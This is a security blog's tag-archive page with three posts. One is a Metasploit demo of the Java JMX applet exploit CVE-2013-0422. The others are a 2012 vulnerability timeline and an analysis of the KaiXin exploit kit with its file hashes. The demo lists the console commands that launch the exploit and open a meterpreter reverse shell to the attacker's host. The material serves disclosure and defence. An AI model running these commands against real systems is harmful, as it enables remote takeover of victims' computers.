Tag Archives: Java 0day

Java Applet JMX 0day Remote Code Execution Metasploit Demo

10/01/2013Exploits, MetasploitCVE-2013-0422, EK, Exploit Kit, Java 0day, Oracle, Oracle Java 0daywow

Timeline :

Vulnerability discovered exploited in the wild by kafeine the 2013-01-10
Metasploit PoC provided the 2013-01-10

PoC provided by :

Unknown
egypt
sinn3r
juan vazquez

Reference(s) :

CVE-2013-0422
OSVDB-89059
0 day 1.7u10 spotted in the Wild – Disable Java Plugin NOW !

Affected version(s) :

Oracle Java SE 7 Update 10 and bellow

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java SE 7 Update 10

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.

Commands :

use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

Year 2012 Main Exploitable Vulnerabilities Interactive Timeline

24/12/2012Vulnerability ManagementAdobe, Adobe Flash 0day, CVE-2012-0002, CVE-2012-0003, CVE-2012-0013, CVE-2012-0056, CVE-2012-0158, CVE-2012-0217, CVE-2012-0500, CVE-2012-0507, CVE-2012-0663, CVE-2012-0754, CVE-2012-0779, CVE-2012-1535, CVE-2012-1675, CVE-2012-1723, CVE-2012-1823, CVE-2012-1875, CVE-2012-1876, CVE-2012-1889, CVE-2012-2122, CVE-2012-3752, CVE-2012-4681, CVE-2012-4792, CVE-2012-4969, CVE-2012-5076, CVE-2012-5613, Flash, Flash 0day, IE 0Day, Internet Explorer 0day, Java, Java 0day, Linux, Microsoft, MySQL, Oracle, Oracle Java 0day, OSVDB-83220wow

You can find, by clicking on the following image, a visualization timeline of the main exploitable vulnerabilities of year 2012.

Start date of a slide is corresponding to:

the date of discovery of the vulnerability, or
the date of report to the vendor, or
the date of public release of the vulnerability

End date of a slide is corresponding to:

the date of vendor security alert notification, or
the date of Metasploit integration, or
the date of fix, or
the date of PoC disclosure

Year 2012 Main Exploitable Vulnerabilities Interactive Timeline

KaiXin Exploit Kit Evolutions

05/12/2012Reverse EngineeringCVE-2011-3544, CVE-2012-0507, CVE-2012-0754, CVE-2012-1723, CVE-2012-1889, CVE-2012-4681, CVE-2012-5076, EK, Exploit Kit, Java, Java 0day, KaiXin, Microsoft, Oracle, Oracle Java 0day, Reader, Reader 0daywow

Beginning August, Kahu Security discovered a new Chinese named KaiXin EK (Exploit Kit). This exploit kit was using, like his brother in blood Gong Da (Gondad) EK, javascript obfuscation “Yszz vip“.

The August version of KaiXin was supporting:

CVE-2011-3544 : An Oracle Java vulnerability fixed during October 2011 CPU.
CVE-2012-0507 : An Oracle Java vulnerability fixed during February 2012 CPU.
CVE-2012-1723 : An Oracle Java vulnerability fixed during June 2012 CPU.
CVE-2012-0754 : An Adobe Reader vulnerability fixed in APSB12-03.
CVE-2012-1889 : An Microsoft XML Core Service vulnerability fixed in MS12-043.

November version of KaiXin has involve by removing support of Oracle Java CVE-2012-0507 and CVE-2012-0754 vulnerabilities, and adding support of Oracle Java CVE-2012-1723 (fixed in Jun 2012 CPU), of Oracle Java CVE-2012-4681 (fixed in End August Oracle Security Alert) and of Oracle Java CVE-2012-5076 (fixed in October 2012 CPU).

Here under a VirusTotal analysis of all involved files:

gS19tbEF.jpg (eef74c38121c225ab4d7f1d2bbb0369a) – 9/46 : CVE-2011-3544
lXjOhqg.jpg (16e2c0a9f6636f9698e4dbe2f56551a9) – 22/46 : CVE-2012-1723
obDb9.jpg (ac8085d9ec48770511c82065d6947eb7) – 27/41 : CVE-2012-4681
MMWYD.jpg (684acb532179d99733273b79c4382b39) – 5/46 : CVE-2012-5076
WysBRr.html (f018e5adf65c0841e58ba9c69703e6d4) – 6/45 : CVE-2012-1889
JSZlR.html (7282d761c60541ad3edf7e480807bcb6) – 3/46 : CVE-2012-1889
rar.css (c11b39439a1eda6923feefcad3993d22) – 18/43 : HEUR:Trojan.Win32.Generic
top.html (13a5c097c74012a6f16fe9a866bee74e) – 2/46 : KaiXin.A

The following diagram describe you the way November version of KaiXin EK is working.

Eric Romang Blog

aka wow on ZATAZ.com